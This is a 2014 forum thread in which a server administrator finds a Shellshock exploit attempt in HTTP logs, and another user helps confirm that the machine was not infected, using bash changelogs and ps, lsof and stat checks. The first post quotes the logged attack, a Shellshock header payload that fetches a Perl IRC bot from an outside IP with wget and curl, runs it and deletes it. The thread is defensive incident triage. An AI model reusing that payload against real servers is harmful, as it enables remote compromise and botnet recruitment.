[SOLVED] Shellschock found in http logs

Habitual · 09-27-2014, 04:20 PM

Found this today in the logs:

Code:

192.227.213.66 - - [27/Sep/2014:10:33:07 -0700] "GET /cgi-bin/hi HTTP/1.0" 404 411 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

I curl'd http://213.5.67.223/jurat and it appears to be an IRC-based "something".
I am not comfortable ignoring this because it shows a 404.

I scanned 46.16.178.158 and I can see Unreal ircd running on several ports including 443 shown in the jurat file.

for now, I simply added those 2 IPs to the firewall.

/tmp, is of course empty.

Code:

apt-get changelog bash | less
Get:1 Changelog for bash (http://changelogs.ubuntu.com/changelogs/pool/main/b/bash/bash_4.2-2ubuntu2.5/changelog) [108 kB]
bash (4.2-2ubuntu2.5) precise-security; urgency=medium

  * SECURITY UPDATE: out-of-bounds memory access
    - debian/patches/CVE-2014-718x.diff: guard against overflow and fix
      off-by-one in bash/parse.y.
    - CVE-2014-7186
    - CVE-2014-7187
  * SECURITY IMPROVEMENT: use prefixes and suffixes for function exports
    - debian/patches/variables-affix.diff: add prefixes and suffixes in
      bash/variables.c.

 -- Marc Deslauriers <marc.deslauriers@ubuntu.com>  Fri, 26 Sep 2014 13:27:53 -0400

bash (4.2-2ubuntu2.3) precise-security; urgency=medium

  * SECURITY UPDATE: incomplete fix for CVE-2014-6271
    - debian/patches/CVE-2014-7169.diff: fix logic in bash/parse.y.
    - CVE-2014-7169

 -- Marc Deslauriers <marc.deslauriers@ubuntu.com>  Thu, 25 Sep 2014 02:11:10 -0400

bash (4.2-2ubuntu2.2) precise-security; urgency=medium

  * SECURITY UPDATE: incorrect function parsing
    - debian/patches/CVE-2014-6271.diff: fix function parsing in
      bash/builtins/common.h, bash/builtins/evalstring.c, bash/variables.c.
    - CVE-2014-6271

 -- Marc Deslauriers <marc.deslauriers@ubuntu.com>  Mon, 22 Sep 2014 15:31:07 -0400

Advice requested and appreciated.

Thanks.

Smokey_justme · 09-27-2014, 05:39 PM

Hmm... IRC controlled bot with tcpflooder, udpflooder and spreader and minimal shell controll ... I'm not sure if it makes to hide as the atd daemon or it uses it to schedule itself for execution (but I can't find where it does this, so my best bet is that it tries to hide as "atd").. I would to a "ps aux | grep atd" and close any atd (if you know it shouldn't run) .. Hmm.. I just realized how rusty my Perl is

Smokey_justme · 09-27-2014, 05:46 PM

Ok... The bot is very familiar with the one described here: http://handlers.sans.org/jullrich/perlbot.html

It just exploits a different bug and hides itself as a different proccess..

Habitual · 09-27-2014, 05:51 PM

Thanks Smokey_justme:

Code:

ps aux | grep atd
daemon     814  0.0  0.0  16908   164 ?        Ss   Sep26   0:00 atd
root     31092  0.0  0.0   8104   928 pts/0    S+   15:40   0:00 grep --color=auto atd

root@web:~# lsof -p 814
COMMAND PID   USER   FD   TYPE DEVICE SIZE/OFF   NODE NAME
atd     814 daemon  cwd    DIR  202,1     4096 144612 /var/spool/cron/atjobs
atd     814 daemon  rtd    DIR  202,1     4096      2 /
atd     814 daemon  txt    REG  202,1    23152   8081 /usr/sbin/atd
atd     814 daemon  mem    REG  202,1    52120 139250 /lib/x86_64-linux-gnu/libnss_files-2.15.so
atd     814 daemon  mem    REG  202,1    47680 139448 /lib/x86_64-linux-gnu/libnss_nis-2.15.so
atd     814 daemon  mem    REG  202,1    97248 145848 /lib/x86_64-linux-gnu/libnsl-2.15.so
atd     814 daemon  mem    REG  202,1    35680 138615 /lib/x86_64-linux-gnu/libnss_compat-2.15.so
atd     814 daemon  mem    REG  202,1    14768 145346 /lib/x86_64-linux-gnu/libdl-2.15.so
atd     814 daemon  mem    REG  202,1  1811128 138163 /lib/x86_64-linux-gnu/libc-2.15.so
atd     814 daemon  mem    REG  202,1    55744 134835 /lib/x86_64-linux-gnu/libpam.so.0.83.0
atd     814 daemon  mem    REG  202,1   149280 144960 /lib/x86_64-linux-gnu/ld-2.15.so
atd     814 daemon    0u   CHR    1,3      0t0   4763 /dev/null
atd     814 daemon    1u   CHR    1,3      0t0   4763 /dev/null
atd     814 daemon    2u   CHR    1,3      0t0   4763 /dev/null
atd     814 daemon    3uW  REG   0,15        4   7698 /run/atd.pid

Given the low pid, I'd venture a guess that atd supposed to be running...
No new crons, rkhunter results are as expected.

My concern is that perl processes can fork and hide as discussed here...

Good stuff at http://handlers.sans.org/jullrich/perlbot.html - Thanks.\

Pasted at pastebin.com 2 days ago - http://pastebin.com/gQ3wz2ET

Smokey_justme · 09-27-2014, 06:01 PM

Hmm.. Low PIDs are not an indicator of a clean process (well, they are, but PIDs are reussable so I wouldn't risk making a security judgment based on them)...
But it just hit me that the user is, since the false "atd" proccess would be running the same user as the web-server.. So.. yeah.. you don't have to worry about being infected..

It's however pretty scary stuff when we start thinking about how many servers are out there with an unfixed bash... Mrrr.. And I used to think that only Windows machines can be used as bot-farms..

Habitual · 09-27-2014, 06:15 PM

Well, if it was masquerading as atd, wouldn't lsof 'find' whatever processes were running from it as a result?
Assuming lsof hadn't been messed with?

Code:

stat /run/atd.pid
  File: `/run/atd.pid'
  Size: 4         	Blocks: 8          IO Block: 4096   regular file
Device: fh/15d	Inode: 7698        Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2014-09-26 06:41:01.925729001 -0700
Modify: 2014-09-26 06:41:01.925729001 -0700
Change: 2014-09-26 06:41:01.925729001 -0700
 Birth: -
root@web:~# cat /run/atd.pid
814
root@web:~# uptime
 16:06:51 up 1 day,  9:26,  1 user,  load average: 0.00, 0.06, 0.19

Code:

apt-get changelog lsof | less
Get:1 Changelog for lsof (http://changelogs.ubuntu.com/changelogs/pool/main/l/lsof/lsof_4.81.dfsg.1-1build1/changelog) [10.6 kB]
lsof (4.81.dfsg.1-1build1) lucid; urgency=low

  * rebuild rest of main for armel armv7/thumb2 optimization;
    UbuntuSpec:mobile-lucid-arm-gcc-v7-thumb2

 -- Alexander Sack <asac@ubuntu.com>  Sun, 07 Mar 2010 00:56:30 +0100

matches "Modify" in stat output...

Code:

stat -c%y /usr/bin/lsof
2010-03-06 19:33:48.000000000 -0800

Thanks for your time.

Smokey_justme · 09-27-2014, 06:19 PM

Hmmm... you've gone to great lenghts just to prove me I'm right about you not being infected? Am I misreading your post or are you misreading mine?

I'm sorry if you're upset about me commenting about you basing a conclusion on the PID... I really am.. I should have just let it be

Habitual · 09-27-2014, 06:21 PM

Quote:

Originally Posted by Smokey_justme

Hmmm... you've gone to great lenghts just to prove me I'm right about you not being infected? Am I misreading your post or are you misreading mine?

I'm sorry if you're upset about me commenting about you basing a conclusion on the PID... I really am.. I should have just let it be

I'm just trying to verify that my thought processes and technique on such Important matters is sound.

Smokey_justme · 09-27-2014, 06:27 PM

Quote:

Originally Posted by Habitual

I'm just trying to verify that my thought processes and technique on such Important matters is sound.

Well, it seems to be.. If it looks like horse and smells like a horse.. It's either the NSA disguised as a zebra or an actual horse...

Habitual · 09-27-2014, 08:10 PM

Well, I'm glad someone else thinks so!

Thanks for all your feedback.

and just in case someone lands here in x years, I ran this also:

Code:

ps -p 814 -o lstart | tail -1 && last reboot | head -1
Fri Sep 26 06:41:01 2014
reboot   system boot  3.2.0-69-virtual Fri Sep 26 06:41 - 18:17 (1+11:36)

and that shows me that atd has been running since last system boot.